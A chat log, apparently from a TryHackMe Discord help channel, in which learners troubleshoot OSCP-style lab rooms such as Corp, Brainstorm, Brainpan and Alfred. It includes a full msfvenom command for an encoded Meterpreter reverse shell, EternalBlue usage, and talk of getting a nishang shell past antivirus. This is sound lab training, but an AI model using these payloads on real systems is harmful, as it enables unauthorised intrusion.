Okay, now when trying to run cmd as administrator (>runas /user:Administrator cmd) I get an error that the user name or password is incorrect. So I'll terminate the box and start it again

Ugh.

You should have a password from the Unattended file. Just try to xfreerdp to the address with administrator and reset the password I guess.

I submitted a bug for it. The password policy should be addressed on the machine.

@fleet wedge Your probably typing the password incorrectly, through just follow Mayor's advice.

I could have re-entered it incorrectly as well

¯_(ツ)_/¯

Okay guys, thank you very much for help!!

any issues connecting to thm?

Just finished the Offensive Pentesting Path. Thanks to all the room creators and those that provided help along the way. I really enjoyed every room.

I'm doing the Windows and Linux Privesc rooms next...but, would appreciate any suggestions on additional rooms that would be good OSCP prep.

Gatekeeper

And not just because I made it.

@fleet wedge ropemporium

Can anybody provide some hint for Lord of the root priv esc... i have got the suid file but not able to figure out the priv esc

@brisk bloom It's bof if I remember correctly

yes it is...is there any poc script for fuzzing

Write your own 🙂

ok..thanx

I don't remember Lord of the Root being a BOF

At least not one that you write out. There was an exploit available if I remember correctly.

Mayor, please check task 2 question 6 of the room 🙂

The answer is that, but it isn't a BoF in the sense that you have to create one.

I actually had to get help with that question because of it. 😛

Just checked the creators writeup, there are two ways of rooting the machine.

||One is a bof and the other is an exploit available on exploit-db.||

That's interesting. I'll have to check that out.

Wish I could see that writeup

I'll post it in the mentor chat 🙂

❤️

just finished gatekeeper, really educative box, great OSCP prep

I’m glad you liked it!

found challenging as my 2nd box of that type, although making the initial script to send its payload properly was painful for a while lol

https://github.com/puckiestyle/pentest/blob/master/brainstorm_puckie.py Anyone has a working python script for brainstorm , mine a Calc is not popping up, you may Pm me ifyou can help me

Are you using Python?

Need to make sure you're using the carriage returns in your script as you have to provide responses before getting to the portion of the program that is exploitable.

Yes python script it is , any help would-be be apriciated

Anyone up to talk about retro? So I could pm to know whether m on right track or a rabbit hole

i guess you can't get exploit to work?

read the writeups, they have a way around

Eh guys, after a break in doing Corp machine (I have written here about my problems with the connection with the box), I am still unable to log in as admin and grab the flag. Does anyone else have problems establishing connection with the box via rdesktop/xfreerdp? I thought that after recent hot fixes, the box would work properly now, unfortunately it keeps on rejecting my connection/runas cmd
I'll provide screenshots of the problems below

Here's the error displayed when trying to connect via rdesktop

Here's successful runas user f***

Here's the error when trying to switch to admin with a correct password

And here's the error if the password is wrong

@fleet wedge Terminate machine and try to rdp into the machine as admin.

Sorry that I'm still stuck with this, but this is the last quest to finish whole path :/

You'll have to renew the password, if I remember correctly.

Okay, I'll try xfreerdp again, but 99% sure it will return error, I'll provide it below if pops up

Terminate the machine and deploy again.

So I have spawned the box again, tried xfreerdp as admin, provided correct password (pasted from notepad) and this happens:

Just as if there was no option to connect as admin, I have never had a problem like that before

Okay, I have some progress, I have changed options of connection and I'm on a good path to succeed (maybe)

All right, so I have found some troubleshooting on github and changed config on my VM of xfreerdp, but my tried of logging as admin retured error as well. Then I have tried logging as Administrator but without using the domain name and I got a window pop up, changed the password and succeeded! The thing is, I have tried at least 3 times such method, so maybe changing the config in xfreerdp and then loggin as Admin was required. If anyone had the same problem, here was the github link: https://github.com/FreeRDP/FreeRDP/issues/2862

Is anyone able to point me in the right direction on brainstorm, with the FTP server. No matter what I do, I cant list the directory contents. I have restarted the guest I think three times. The FTP service seems to be broken, or I am not doing something correctly.

Brainstorm is just FTP to as user anonymous

@fleet siren , you can Pm me of you want, i can help you Partly on brainstorm

Thank you @fierce kettle I was able to get it resolved by changing my vpn location. Appreciate the note.

can anyone give me a pointer on the vulnversity privesc? i cant seem to write a module without echoing line by line due to the shell, which then ignores quotes and screws up my reverse shell

@slender jasper try creating the file locally then uploading it

i fixed it

Can anyone tell me how can I optimize Hydra so that it would go through the password list slightly faster? I know thread count is one thing, but are there any others like GPU acceleration or sthing?

Hydra is working remotely, so the speed is down to the server really @chrome palm

Ah, I understand; so besides choosing the thread count, I can't do much?

Also, anyone actually uses GPU acceleration when possible on Kali?

Correct.
In terms of GPU acceleration, if it's on a VM it doesn't actually have access to your GPU unless you pass it through -- which is a pain by all accounts.

I have it physically installed

Since I do a lot of portable work and I don't mind using Debian on the go, I chose Kali as daily driver on my laptop, and well, I was curious whether I can use the GPU on it for anything special

Sure. Things like hash cracking go a lot faster using your GPU

Hashcat is the big GPU user when it comes to hacking

Okay, I'll get on that. Seems like a better option than John tbh

Oh yeah

My preference is for Hashcat myself

There are things that John does better

But Hashcat bare metal is awesome

Isn't JTR CPU-accelerated if I recall correctly?

JTR works off your CPU, yes

Hashcat is designed to work off your GPU. It can run on your CPU, but it's not advisable.

Heck, we have one of its developers in here

He frequently recommends against forcing it on CPU

who's that lol @chrome valve

Solved brainstorm 💪

I need help on steel mountain. i've followed 3 independent guides, literally keystroke for keystroke, and i cannot get the service to throw a shell back to my nc listener

have you tried resetting the room?

have you tried resetting the room?
10+ times

ahhhh, i have forgotten my thm password so i cant help so much rn lol

are you using metasploit?

are you using metasploit?
No, i like the hard route

what do you mean hard route? There’s no difference except how you craft the payload. What payload are you using to get back the shell

what do you mean hard route? There’s no difference except how you craft the payload. What payload are you using to get back the shell
No metasploit / meterpreter . ive tried 3 different payloads, and varied the ports in case theres a host firewall

followed this exactly, except for IP orc: https://www.youtube.com/watch?v=mf1sRybj6Sk

name it advanced.exe that what I know worked for me

Then just stop and start the service again and get nc up it’s going to take about a minute to get back a shell

Have you tried my guide on the site? It covers the non-metasploit route pretty heavily.

Almost to the keystroke. But like Cryillic said, proper placement and sc stop/start is what matters here.

I am stuck at Anthem's reverse shell wherein I am trying to download the nishang PS reverse TCP and its getting detected by antivirus...any hint to bypass it?

You are massively overcomplicating that box...

Ok...let me try by uploading nc n executing it

Also hugely overcomplicating it

Why not try logging in with RDP?

Thanx...done with box

Why do simple when you can do hard?

Hey I am running into a issue with Brainstorm, I am trying to FTP into the server and once i log in as anonymous it will not let me ls the files. I made sure my firewall is off and tried running it in passive mode but no luck. Any clue?

ftp> ls
501 Server cannot accept argument.
ftp: bind: Address already in use
ftp>

Hi everyone! Still new to discord chats so let me know if I should be asking this somewhere else. I have been working on Blue room and for the life of me I can't get the exploit working. The recommendation was to reboot the VM if the exploit fails. I have already rebooted the VM about 6 times. Any hints?

are you talking about getting intial access?

yes.

what exploit are you running and are you making sure to set the rhost and all that good stuff?

exploit/windows/smb/ms17_010_eternalblue

set rhost <ip> then run but this keeps failing after multiple reboots of the machine

#room-help

@wet sierra thanks!

@rustic hill just ran it to test and it works fine for me. Maybe try updating everything? Also check to see if your vpn is still connected.

Sorry if I am not being much help, I am still pretty new myself.

thanks @zealous swallow let me give this a couple more tries after an update.

oh wow! it worked! until last time, I had the VPN connection from host and was firing msfconsole from a kali VM. initiated the vpn connection from kali linux and worked on first try. I wonder if this is an actual thing or I got lucky.

Well ether way congratz!

thanks! and thanks for the help!

But I am pretty sure that is how it has to work, if you are using a VM the VPN has to be connected on the VM and no problem at all, goodluck!

Blue can be done without msfconsole and using worawit, s files💪

is the Jenkins machine broken? I can't see a flag in the location where there should be a flag 😒

*Alfred sorry not Jenkins

Alfred is working fine.

hello, im doing brainpan 1 and im creating my reverse shell exploit and it all looks good to me but it just crashes the server and doesnt open a reverse shell. I actually looked up a walkthrough and the code is the exact same but mine crashes the server whereas in the walkthrough they are able to open a reverse shell. Has anyone had this problem before with this box?

as well as for brainstorm, my local reverse shell works but the remote one does not (I changed the IPs and connected to the VPN)

@dense root you can Pm me i can help

hi everyone

can I ask queston about Alfred

about Switching Shells section

I dont get it

I crafted msfvenom payload

downloaded it on the server

no

secondly I started msfconsole handler on 4444

then I downloaded payload

but I losted previous connection

and now I dont have shell

can anyone help me wuth advise?

okay only issue is with Start-Process

is it need to be like powershell Start-Process "shellname.exe" ?

that walkthrough is kinda

...

maybe I need to remove " "

let me try

C:\Program Files (x86)\Jenkins\workspace\project>Start-Process shell.exe
'Start-Process' is not recognized as an internal or external command,
operable program or batch file.

PS C:> Start-Process <String>

probably I need to begin with powershell

lol

t has to be like

powershell "(Start-Process 'shell.exe')" ?

@here

anyone

hate this roooom

Start-Process "shell-name.exe"

'Start-Process' is not recognized as an internal or external command,
operable program or batch file.

no reverse shell

if Start-Process isn't recognized then youre not calling it from powershell

@cloud rain

C:\Program Files (x86)\Jenkins\workspace\project>powershell "Start-Process 'shell.exe'" it just finished successfully and no back connect to multy handler

what could be issue?

msfvenom -p windows/meterpreter/reverse_tcp =a x86 --encoder x86/shikata_ga_nai LHOST=10.11.3.26 LPORT=4444 -f exe -o shell.exe

powershell -c "Start-Process 'shell.exe'"?

Started reverse TCP handler on 10.11.3.26:4444

no without -c, let me google why with -c

I tried -Command

is it the same like -c

no, still nothing happens

can you just run the executable normally?

shell.exe

Double check the IP address

Why not just run it from the command line? I know what the guide says, but Powershell is wonky sometimes. Just run the executable as normal to see if it works.

Note to self: ||loading all commands at once in Jenkins, even with listeners set, doesn't seem to work for me||

Can I ask someone a question about Corp?

Interesting ... OSCP learning paths is now this room. Just curious. What was the reason for the name change ?

Its scope isn’t limited specifically to the OSCP

guys I'm starting to learn Linux and the 4th task says log in with putty or ssh with user shiba1 with the same password, but it coming back with Permission Denied. Does that sound like a wrong password issue?

I've tried both putty and ssh

Why not just run it from the command line? I know what the guide says, but Powershell is wonky sometimes. Just run the executable as normal to see if it works.
@rancid vine Sorry didn't recive notification, I tried everything and steps you advise also

@fiery beacon Can you screenshot?

You're trying to SSH into the Kali machine -- not the target

Try using the IP address for the Learn Linux VM

And do it inside the kali machine, rather than in your own PuTTY

No need for PuTTY when you have Kali

ahhh ok thank you

I understood it as my Kali machine

@fiery beacon I believe you were typing the name and password wrong too. Try look at it closely again.

what if you receive a "connection has timed out"?

We need more information than this in order to help Jinketh.

hi, I am working on brainstorm and my script looks to be correctly written, although i am not getting the results I'm expecting in immunity. tried with ollydbg too and got very similar results.

Can you share it here please? Screenshot is fine Alger.

Remember that Brainstorm needs a carriage return to function properly.

yeah

I should've looked closer when I worked on this before

🤦

I have a different EIP

the script i used https://pastebin.com/ai6fxfw2 and this is what happens in immunity

gatekeeper worked as expected, the example heath did in PEH worked as expected, this is the first time i've hit an issue.

tried with the second address mona found, too. no luck there either.

Oddly enough my script that I did it with originally isn't working.

I'm definitely crashing the room. It's completely unresponsive.

i had this problem yesterday, sometimes it would crash the room and then id reboot the box and itd sometimes work, so i think the box is just buggy @rancid vine @glacial bobcat

I agree. I'm going to submit a bug report on it. Thanks for the feedback.

no problem. If youve done it already could you check Brainpan1 as well? I looked at walkthroughs and my payload is the same, but it just crashes the server so i think theres a bug in that one too

but i dont want to submit it unless someone smarter than me double checks 😅

glad to know it might not have been me.

😌

i spent a whole day stressing over it, so its not you haha

mayor, do you know of a linux equivalent of mona modules, where basically you would do the same process in gdb as you do in immunity debugger?

or anyone

I don't.

I looked for something for OllyDBG, but it's so old that the plugin support is hard to find.

I have an exe that I can find ESP's and other address with that I run with wine. Works well enough.

gotcha, so you use that to do the modules finding & JMP finding part of bofs?

is there anything else you know of/recommend, or any process you know of for gdb (or anything people use for linux servers)?

Can use it yea. I've not used anything except Olly on Linux. And it's a lot to be desired.

Cool, thanks!

Followed up in #site-support. Didn't get much of a response. Fingers crossed it gets fixed soon. I would love to complete ths path.......

Anyone have time for a quick sanity check on Brainpan?

Has anyone attempted the oscp after taking this path with success?

@gentle glade read up on the scrollback. i think it's experiencing a issue.

I need a hint on Corp. Task 3 - #3 - hashcat isn't on the corp box. so like, wtf. i can't copy/paste to/from the box.... am I really supposed to type that hash output character for character into a file on my kali box?

surely no way, right?

(tried loggin in with winrm, because obviously that'd be way easier, but no luck there either)

Rdp right? Try using a client that allows for clipboard syncing (xfreerdp and remmina have that iirc)

tried 😦

winrm would make this so much more enjoyable.

idk why that's not the path.

this is incredibly frustrating. thankfully I found a walkthrough with the hash pasted for our reference. if anyone hits the same issue DM me, I will gladly share if you can't find it on your own.

I think I control C'd it for some reason using xfreerdp.

nice. didn't work here.

can anyone list out BOF and windows priv esc room names ?

That's not really a question meant for this channel. And we have to go research all of those rooms for you with a question like this.

Gatekeeper, Brainpan, Brainstorm are Windows BOF rooms. Every Windows machine on the platform has some sort of privesc. There's even a Windows Privesc Room.

need some help with alfred room task 2

so ask away and if someone can help you they will

got my answer in the help channel

thanks for the response

sure

Uh, no

ok buddy

Please don't paste links to other servers in here -- check the #rules channel 🙂

K

Yo anyone here up for some bug bounties?

Wrong channel that would be #cyber-and-careers or #general

i'm not able to make an accurate script for CICADA-3301 book cipher decoding..

can anybody help?

I'm not sure this is related to a TryHackMe room is it?

ya theres a room ,kind of clone of cicada.

yes it is but please put it in #room-help also because I’m writing anyways you don’t need a script unless you really need one but you can easily do it by hand

are good are THM rooms (boxes) as compared to HTB?

THM and HTB are fundamentally different and have different approaches

Yes, most of THM boxes are really good

bit biased, no?

😛

(the rooms are mostly well done though)

HTB isn't bad either, they have pretty awesome boxes 🙂

Yea, it's just a matter of preference, environment, etc. I prefer THM because it's a learning platform, but I've started dabbling on HTB more now that I'm comfortable with my knowledge base.

hey @rancid vine, follow up on brainpan from yesterday:
This pic shows the return address im writing over the EIP with is ||311712F3||

This shows that that memory address is a JMP ESP as expected

The payload I'm using (I'm doing it locally, hence the 192 IP)

and the full exploit

which just crashes the server; I have tried with a windows payload as well; as well as encoding the payload (but it does that automatically anyway)

tried with staged and unstaged as well, but still no luck

is there something that I'm missing?

I’ll take a look when I get home

So it looks like you're trying to connect locally, which I am assuming you're using a Windows lab machine to do so. Keep in mind you need a Windows payload if you're doing that. Confirm that it works, and then change your payload to a Linux payload when you run the actual exploit against the brainpan machine.

still crashes the server locally & no shell

@rancid vine

just tried a staged and unstaged payload (windows/shell_reverse_tcp & windows/shell/reverse_tcp), with the same script i sent above (replacing the shellcode) and still crashes the server, no shell

Maybe get rid of all the b's that you have in the shellcode, and in your exploit

I usually remove those when I have to use Python

same problem (server crashing, no shell) with the b's removed

Is the firewall disabled?

yes, and i was also able to get a shell on gatekeeper, as well as brainstorm locally (tested just now) so i dont think its a configuration issue

Found it